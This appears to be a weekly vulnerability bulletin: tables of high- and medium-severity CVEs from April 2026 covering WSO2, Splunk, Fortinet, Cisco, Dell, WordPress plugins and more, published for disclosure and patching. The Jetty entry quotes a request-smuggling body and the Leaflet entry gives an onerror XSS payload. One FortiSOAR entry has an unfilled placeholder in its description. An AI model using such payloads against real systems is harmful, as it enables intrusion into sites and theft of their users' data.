| WSO2--WSO2 API Manager | The XML parsers within multiple WSO2 products accept user-supplied XML data without properly configuring to prevent the resolution of external entities. This omission allows malicious actors to craft XML payloads that exploit the parser's behavior, leading to the inclusion of external resources. By leveraging this vulnerability, an attacker can read confidential files from the file system and access limited HTTP resources reachable by the product. Additionally, the vulnerability can be exploited to perform denial of service attacks by exhausting server resources through recursive entity expansion or fetching large external resources. | 2026-04-16 | 7.5 | CVE-2024-2374 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3255/ |
| Bosch--BVMS | Uncontrolled Resource Consumption in Bosch VMS Central Server in Bosch VMS 12.0.1 allows attackers to consume excessive amounts of disk space via network interface. | 2026-04-15 | 7.5 | CVE-2024-33618 | https://psirt.bosch.com/security-advisories/BOSCH-SA-162032-BT.html |
| Dell--PowerProtect Data Domain BoostFS | Dell PowerProtect Data Domain BoostFS for client of Feature Release versions 7.7.1.0 through 8.5, LTS2025 release version 8.3.1.0 through 8.3.1.20, LTS2024 release versions 7.13.1.0 through 7.13.1.50, contain an insufficiently protected credentials vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to credential exposure. The attacker may be able to use the exposed credentials to access the system with privileges of the compromised account. | 2026-04-17 | 7.8 | CVE-2025-36568 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| WC Lovers--WCFM Marketplace | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WC Lovers WCFM Marketplace allows SQL Injection. This issue affects WCFM Marketplace: from n/a through 3.7.1. | 2026-04-15 | 7.6 | CVE-2025-63029 | https://patchstack.com/database/wordpress/plugin/wc-multivendor-marketplace/vulnerability/wordpress-wcfm-marketplace-plugin-3-7-1-sql-injection-vulnerability?_s_id=cve |
| FirebirdSQL--firebird | Firebird is an open-source relational database management system. FB3 versions of the client library placed incorrect data length values into XSQLDA fields when communicating with FB4 or higher servers, resulting in an information leak. This issue is fixed by upgrading to the FB4 client or higher. | 2026-04-17 | 7.9 | CVE-2025-65104 | https://github.com/FirebirdSQL/firebird/security/advisories/GHSA-mfpr-9886-xjhg https://github.com/FirebirdSQL/firebird/releases/tag/v4.0.0 |
| Lenovo--Diagnostics | During an internal security assessment, a potential vulnerability was discovered in Lenovo Diagnostics and the HardwareScanAddin used in Lenovo Vantage that, during installation or when using hardware scan, could allow a local authenticated user to perform an arbitrary file write with elevated privileges. | 2026-04-15 | 7.1 | CVE-2026-0827 | https://support.lenovo.com/us/en/product_security/LEN-210693 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.1, 10.0.5, 9.4.10, and 9.3.11, and Splunk Cloud Platform versions below 10.4.2603.0, 10.3.2512.5, 10.2.2510.9, 10.1.2507.19, 10.0.2503.13, and 9.3.2411.127, a low-privileged user that does not hold the `admin` or `power` Splunk roles could potentially perform a Remote Code Execution (RCE) by uploading a malicious file to the `$SPLUNK_HOME/var/run/splunk/apptemp` directory due to improper handling and insufficient isolation of temporary files within the `apptemp` directory. | 2026-04-15 | 7.1 | CVE-2026-20204 | https://advisory.splunk.com/advisories/SVD-2026-0403 |
| Splunk--Splunk MCP Server | In Splunk MCP Server app versions below 1.0.3, a user who holds a role with access to the Splunk `_internal` index or possesses the high-privilege capability `mcp_tool_admin` could view users' session and authorization tokens in clear text. The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) and [Connecting to MCP Server and Admin settings](https://help.splunk.com/en/splunk-enterprise/mcp-server-for-splunk-platform/connecting-to-mcp-server-and-admin-settings) in the Splunk documentation for more information. | 2026-04-15 | 7.2 | CVE-2026-20205 | https://advisory.splunk.com/advisories/SVD-2026-0407 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-04-14 | 7.8 | CVE-2026-20930 | Windows Management Services Elevation of Privilege Vulnerability |
| Ubiquiti Inc--UniFi Play PowerAmp | An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 7.5 | CVE-2026-22566 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Eaton--IPP software | Eaton Intelligent Power Protector (IPP) is affected by insecure library loading in its executable, which could lead to arbitrary code execution by an attacker with access to the software package. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download center. | 2026-04-16 | 7.8 | CVE-2026-22619 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| easyappointments--Easy Appointments | The Easy Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.12.21 via the `/wp-json/wp/v2/eablocks/ea_appointments/` REST API endpoint. This is due to the endpoint being registered with `'permission_callback' => '__return_true'`, which allows access without any authentication or authorization checks. This makes it possible for unauthenticated attackers to extract sensitive customer appointment data including full names, email addresses, phone numbers, IP addresses, appointment descriptions, and pricing information. | 2026-04-17 | 7.5 | CVE-2026-2262 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e681aa8e-522e-4092-aa1f-8ada3097c8d6?source=cve https://plugins.trac.wordpress.org/browser/easy-appointments/tags/3.12.19/ea-blocks/ea-blocks.php#L190 https://plugins.trac.wordpress.org/browser/easy-appointments/trunk/ea-blocks/ea-blocks.php#L190 https://plugins.trac.wordpress.org/browser/easy-appointments/tags/3.12.19/ea-blocks/ea-blocks.php#L141 https://plugins.trac.wordpress.org/changeset/3485692/easy-appointments/trunk/ea-blocks/ea-blocks.php https://plugins.trac.wordpress.org/changeset?old_path=%2Feasy-appointments/tags/3.12.21&new_path=%2Feasy-appointments/tags/3.12.22 |
| Barracuda Networks--RMM | Barracuda RMM versions prior to 2025.2.2 contain a privilege escalation vulnerability that allows local attackers to gain SYSTEM-level privileges by exploiting overly permissive filesystem ACLs on the C:\Windows\Automation directory. Attackers can modify existing automation content or place attacker-controlled files in this directory, which are then executed under the NT AUTHORITY\SYSTEM account during routine automation cycles, typically succeeding within the next execution cycle. | 2026-04-15 | 7.8 | CVE-2026-22676 | https://download.mw-rmm.barracudamsp.com/PDF/2025.2.2/RN_BRMM_2025.2.2_EN.pdf https://www.vulncheck.com/advisories/barracuda-rmm-privilege-escalation-via-insecure-directory-permissions |
| Fortinet--FortiAnalyzer Cloud | A heap-based buffer overflow vulnerability in Fortinet FortiAnalyzer Cloud 7.6.2 through 7.6.4 and FortiManager Cloud 7.6.2 through 7.6.4 may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. Successful exploitation would require a large amount of effort in preparation because of ASLR and network segmentation. | 2026-04-14 | 7.3 | CVE-2026-22828 | https://fortiguard.fortinet.com/psirt/FG-IR-26-121 |
| Eclipse Foundation--Eclipse Jetty | In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here: https://w4ke.info/2025/06/18/funky-chunks.html and https://w4ke.info/2025/10/29/funky-chunks-2.html. Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error. Example request body from the advisory: `POST / HTTP/1.1 Host: localhost Transfer-Encoding: chunked 1;ext="val X 0 GET /smuggled HTTP/1.1 ...` Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request. | 2026-04-14 | 7.4 | CVE-2026-2332 | https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf https://gitlab.eclipse.org/security/cve-assignment/-/issues/89 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| WSO2--WSO2 API Manager | The authentication endpoint fails to adequately validate user-supplied input before reflecting it back in the response. This allows an attacker to inject malicious script payloads into the input parameters, which are then executed by the victim's browser. Successful exploitation can enable an attacker to redirect the user's browser to a malicious website, modify the UI of the web page, or retrieve information from the browser. However, the impact is limited as session-related sensitive cookies are protected by the httpOnly flag, preventing session hijacking. | 2026-04-16 | 6.1 | CVE-2024-10242 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3741/ |
| WSO2--WSO2 Identity Server | Active access tokens are not revoked or invalidated when a user account is locked within WSO2 Identity Server. This failure to enforce revocation allows previously issued, valid tokens to remain usable, enabling continued access to protected resources by locked user accounts. The security consequence is that a locked user account can maintain access to protected resources through the use of existing, unexpired access tokens. This creates a security gap where access control policies are bypassed, potentially leading to unauthorized data access or actions until the tokens naturally expire. | 2026-04-16 | 6 | CVE-2025-12624 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4684/ |
| flippercode--WP Maps Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters | The WP Maps - Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'put_wpgm' shortcode in all versions up to, and including, 4.8.7. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-16 | 6.4 | CVE-2025-13364 | https://www.wordfence.com/threat-intel/vulnerabilities/id/91d6cf21-cb65-40cb-ad19-5a8e7179fd98?source=cve https://plugins.trac.wordpress.org/changeset?old_path=wp-google-map-plugin/tags/4.8.7/wp-google-map-plugin.php&new_path=wp-google-map-plugin/tags/4.8.8/wp-google-map-plugin.php |
| DesigningMedia--Eleganzo | The Eleganzo theme for WordPress is vulnerable to arbitrary directory deletion due to insufficient path validation in the akd_required_plugin_callback function in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary directories on the server, including the WordPress root directory. | 2026-04-14 | 6.5 | CVE-2025-15470 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7c5d7818-e548-4d8f-b847-396d528b58cd?source=cve https://testwp.local/wp-content/themes/eleganzo/welcome.php#L96 |
| Emarket-design--YouTube Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Emarket-design YouTube Showcase allows Stored XSS. This issue affects YouTube Showcase: from n/a through 3.5.1. | 2026-04-15 | 6.5 | CVE-2025-15636 | https://patchstack.com/database/wordpress/plugin/youtube-showcase/vulnerability/wordpress-youtube-showcase-plugin-3-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| HCLSoftware--Velocity | Rate Limiting for attempting a user login is not being properly enforced, making HCL DevOps Velocity susceptible to brute-force attacks past the unsuccessful login attempt limit. This vulnerability is fixed in 5.1.7. | 2026-04-13 | 6.8 | CVE-2025-31991 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130138 |
| ABB--AC800M (System 800xA) | A vulnerability exists in the command handling of the IEC 61850 communication stack included in the product revisions listed as affected in this CVE. An attacker with access to IEC 61850 networks could exploit the vulnerability by using a specially crafted 61850 packet, forcing the communication interfaces of the PM 877, CI850 and CI868 modules into fault mode or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. The System 800xA IEC61850 Connect is not affected. Note: This vulnerability does not impact the overall availability and functionality of the S+ Operations node, only the 61850 communication function. This issue affects AC800M (System 800xA): from 6.0.0x through 6.0.0303.0, from 6.1.0x through 6.1.0031.0, from 6.1.1x through 6.1.1004.0, from 6.1.1x through 6.1.1202.0, from 6.2.0x through 6.2.0006.0; Symphony Plus SD Series: A_0, A_1, A_2.003, A_3.005, A_4.001, B_0.005; Symphony Plus MR (Melody Rack): from 3.10 through 3.52; S+ Operations: 2.1, 2.2, 2.3, 3.3. | 2026-04-13 | 6.5 | CVE-2025-3756 | https://search.abb.com/library/Download.aspx?DocumentID=7PAA020125&LanguageCode=en&DocumentPartId=&Action=Launch |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior to 9.12.0.0, contains an insertion of sensitive information into log file vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account. | 2026-04-16 | 6.6 | CVE-2025-43937 | https://www.dell.com/support/kbdoc/en-us/000376214/dsa-2025-347-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain a session fixation vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.2 | CVE-2025-46605 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain an improper restriction of excessive authentication attempts vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.2 | CVE-2025-46606 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain an improper authentication vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.6 | CVE-2025-46607 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain an improper authentication vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.6 | CVE-2025-46641 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Fortinet--FortiOS | A missing authentication for critical function vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiOS 6.2.9 through 6.2.17 allows an attacker to execute unauthorized code or commands via specially crafted packets. | 2026-04-14 | 6.2 | CVE-2025-53847 | https://fortiguard.fortinet.com/psirt/FG-IR-26-125 |
| WSO2--WSO2 API Manager | The authentication endpoint fails to encode user-supplied input before rendering it in the web page, allowing for script injection. An attacker can leverage this by injecting malicious scripts into the authentication endpoint. This can result in the user's browser being redirected to a malicious website, manipulation of the web page's user interface, or the retrieval of information from the browser. However, session hijacking is not possible due to the httpOnly flag protecting session-related cookies. | 2026-04-16 | 6.1 | CVE-2025-6024 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4251/ |
| Fortinet--FortiManager | An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC API. | 2026-04-14 | 6.8 | CVE-2025-61848 | https://fortiguard.fortinet.com/psirt/FG-IR-26-111 |
| leaflet[.]com--Leaflet 1.9.4 | Leaflet versions up to and including 1.9.4 are vulnerable to Cross-Site Scripting (XSS) via the bindPopup() method. This method renders user-supplied input as raw HTML without sanitization, allowing attackers to inject arbitrary JavaScript code through event handler attributes (e.g., <img src=x onerror="alert('XSS')">). When a victim views an affected map popup, the malicious script executes in the context of the victim's browser session. | 2026-04-14 | 6.1 | CVE-2025-69993 | http://leaflet.com https://github.com/PierfrancescoConti/leaflet-cve-2025-69993/blob/main/ADVISORY.md |
| Microsoft--Windows 10 Version 1607 | Reliance on untrusted inputs in a security decision in Windows Boot Loader allows an authorized attacker to bypass a security feature locally. | 2026-04-14 | 6.7 | CVE-2026-0390 | UEFI Secure Boot Security Feature Bypass Vulnerability |
| SAP_SE--SAP Supplier Relationship Management (SICF Handler in SRM Catalog) | Due to a Cross-Site Scripting (XSS) vulnerability in the SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL, that if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected. | 2026-04-14 | 6.1 | CVE-2026-0512 | https://me.sap.com/notes/3645228 https://url.sap/sapsecuritypatchday |
| turn2honey--EMC Easily Embed Calendly Scheduling | The EMC - Easily Embed Calendly Scheduling Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's calendly shortcode in all versions up to, and including, 4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-19 | 6.4 | CVE-2026-0868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d5653ebe-7145-4b1c-94f8-ca87ed0dc4f5?source=cve https://plugins.trac.wordpress.org/changeset/3466576/embed-calendly-scheduling |
| vanderwijk--Content Blocks (Custom Post Widget) | The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's content_block shortcode in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied values consumed from user-created content blocks. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-18 | 6.4 | CVE-2026-0894 | https://www.wordfence.com/threat-intel/vulnerabilities/id/246dee15-82e0-4630-8d95-d2419e9eaef8?source=cve https://plugins.trac.wordpress.org/changeset/3447914/custom-post-widget |
| youzify--Youzify BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress | The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-18 | 6.4 | CVE-2026-1559 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6bd69711-8303-4086-87c3-eb2935a89aff?source=cve https://plugins.trac.wordpress.org/browser/youzify/trunk/includes/public/core/wall/class-youzify-form.php#L506 https://plugins.trac.wordpress.org/browser/youzify/tags/1.3.6/includes/public/core/wall/class-youzify-form.php#L506 https://plugins.trac.wordpress.org/browser/youzify/trunk/includes/public/core/class-youzify-wall.php#L109 https://plugins.trac.wordpress.org/browser/youzify/tags/1.3.6/includes/public/core/class-youzify-wall.php#L109 https://plugins.trac.wordpress.org/changeset/3483281/youzify/trunk/includes/public/core/wall/class-youzify-form.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fyouzify/tags/1.3.6&new_path=%2Fyouzify/tags/1.3.7 |
| livemesh--Livemesh Addons by Elementor | The Livemesh Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 9.0. This is due to missing authorization checks on the AJAX handler `lae_admin_ajax()` and insufficient output escaping on multiple checkbox settings fields. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in the plugin settings page that will execute whenever an administrator accesses the plugin settings page granted they can obtain a valid nonce, which can be leaked via the plugin's improper access control on settings pages. | 2026-04-16 | 6.4 | CVE-2026-1572 | https://www.wordfence.com/threat-intel/vulnerabilities/id/24b9bf5a-19ac-4e99-b32d-1ab681356a1b?source=cve https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/admin/admin-ajax.php#L28 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/admin/admin-ajax.php#L64 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/admin/admin-ajax.php#L64 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/admin/admin-ajax.php#L28 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/plugin.php#L207 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/plugin.php#L207 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/admin/views/settings.php#L707 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/admin/views/settings.php#L707 |
| surbma--Surbma \| Booking.com Shortcode | The Surbma \| Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-14 | 6.4 | CVE-2026-1607 | https://www.wordfence.com/threat-intel/vulnerabilities/id/01280afb-4745-4f36-823e-ed794bb3353a?source=cve https://plugins.trac.wordpress.org/browser/surbma-bookingcom-shortcode/tags/2.0/surbma-bookingcom-shortcode.php#L34 |
| Lenovo--Service Bridge | A potential DLL hijacking vulnerability was reported in Lenovo Service Bridge that, under certain conditions, could allow a local authenticated user to execute code with elevated privileges. | 2026-04-15 | 6.7 | CVE-2026-1636 | https://support.lenovo.com/us/en/product_security/LEN-211071 |
| prasunsen--Hostel | The Hostel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcode_id' parameter in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-04-18 | 6.1 | CVE-2026-1838 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b9da491-771a-4100-b41a-7411981dd34b?source=cve https://plugins.trac.wordpress.org/browser/hostel/trunk/hostel.php#L44 https://plugins.trac.wordpress.org/browser/hostel/tags/1.1.6/hostel.php#L44 https://plugins.trac.wordpress.org/browser/hostel/trunk/controllers/ajax.php#L28 https://plugins.trac.wordpress.org/browser/hostel/tags/1.1.6/controllers/ajax.php#L28 https://plugins.trac.wordpress.org/browser/hostel/trunk/views/partial/rooms-table.html.php#L29 https://plugins.trac.wordpress.org/browser/hostel/tags/1.1.6/views/partial/rooms-table.html.php#L29 https://plugins.trac.wordpress.org/changeset/3478265/hostel/trunk/hostel.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fhostel/tags/1.1.6&new_path=%2Fhostel/tags/1.1.7 |
| woobeewoo--Product Pricing Table by WooBeWoo | The Product Pricing Table by WooBeWoo plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on the updateLabel() and remove() functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages or delete pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-15 | 6.1 | CVE-2026-1852 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a3b459e0-4bd9-443e-96e4-91663a35c26e?source=cve https://github.com/wpcodefactory/woo-product-pricing-tables/releases/tag/v1.1.1 |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to conduct a reflected XSS attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | 2026-04-15 | 6.1 | CVE-2026-20059 | cisco-sa-unity-vulns-n2EJSbbw |
| Cisco--Cisco Unity Connection | Multiple vulnerabilities in Cisco Unity Connection could allow an authenticated, remote attacker to download arbitrary files from an affected system. To exploit these vulnerabilities, the attacker must have valid administrative credentials. These vulnerabilities are due to improper sanitization of user input to the web-based management interface. An attacker could exploit these vulnerabilities by sending a crafted HTTPS request. A successful exploit could allow the attacker to download arbitrary files from an affected system. | 2026-04-15 | 6.5 | CVE-2026-20078 | cisco-sa-unity-file-download-RmKEVWPx |
| Cisco--Cisco Unity Connection | Multiple vulnerabilities in Cisco Unity Connection could allow an authenticated, remote attacker to download arbitrary files from an affected system. To exploit these vulnerabilities, the attacker must have valid administrative credentials. These vulnerabilities are due to improper sanitization of user input to the web-based management interface. An attacker could exploit these vulnerabilities by sending a crafted HTTPS request. A successful exploit could allow the attacker to download arbitrary files from an affected system. | 2026-04-15 | 6.5 | CVE-2026-20081 | cisco-sa-unity-file-download-RmKEVWPx |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the CLI of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, local attacker with administrative privileges to perform a command injection attack on the underlying operating system and elevate privileges to root. This vulnerability is due to insufficient validation of user supplied input. An attacker could exploit this vulnerability by providing crafted input to a specific CLI command. A successful exploit could allow the attacker to elevate their privileges to root on the underlying operating system. | 2026-04-15 | 6 | CVE-2026-20136 | cisco-sa-ise-cmd-inj-5WSJcYJB |
| Cisco--Cisco Webex Contact Center | A vulnerability in the Desktop Agent functionality of Cisco Webex Contact Center could have allowed an unauthenticated, remote attacker to conduct cross-site scripting attacks. Cisco has addressed this vulnerability in the Cisco Webex Contact Center service, and no customer action is needed. This vulnerability existed because HTML and script content was not properly handled. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by persuading a user to follow a malicious link. A successful exploit could have allowed the attacker to steal sensitive information from the browser, including authentication and session information. | 2026-04-15 | 6.1 | CVE-2026-20170 | cisco-sa-webexcc-xss-WEX5nUnA |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.10, and 9.3.11, and Splunk Cloud Platform versions below 10.4.2603.0, 10.3.2512.6, 10.2.2510.10, 10.1.2507.20, 10.0.2503.13, and 9.3.2411.127, a user who holds a role that contains the high-privilege capability `edit_user` could create a specially crafted username that includes a null byte or a non-UTF-8 percent-encoded byte due to improper input validation. This could lead to inconsistent conversion of usernames into a proper format for storage and account management inconsistencies, such as being unable to edit or delete affected users. | 2026-04-15 | 6.6 | CVE-2026-20202 | https://advisory.splunk.com/advisories/SVD-2026-0401 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in Retail Mode prior to SMR Apr-2026 Release 1 allows local attackers to trigger privileged functions. | 2026-04-13 | 6.6 | CVE-2026-21010 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Adobe--Adobe Connect | Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed. | 2026-04-14 | 6.1 | CVE-2026-21331 | https://helpx.adobe.com/security/products/connect/apsb26-37.html |
| Fortinet--FortiSOAR on-premise | A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an attacker to disclose information via <insert attack vector here>. | 2026-04-14 | 6.2 | CVE-2026-22155 | https://fortiguard.fortinet.com/psirt/FG-IR-26-106 |
| Fortinet--FortiSOAR on-premise | An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5 all versions, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5 all versions, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform path traversal attack via File Content Extraction actions. | 2026-04-14 | 6.2 | CVE-2026-22573 | https://fortiguard.fortinet.com/psirt/FG-IR-26-116 |
| Eaton--IPP Software | Due to improper input validation in one of the Eaton Intelligent Power Protector (IPP) XML, it is possible for an attacker with admin privileges and access to the local system to inject malicious code resulting in arbitrary command execution. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download centre. | 2026-04-16 | 6 | CVE-2026-22615 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| Eaton--IPP Software | Eaton Intelligent Power Protector (IPP) software allows repeated authentication attempts against the web interface login page due to insufficient rate-limiting controls. This security issue has been fixed in the latest version of Eaton IPP which is available on the Eaton download centre. | 2026-04-16 | 6.5 | CVE-2026-22616 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
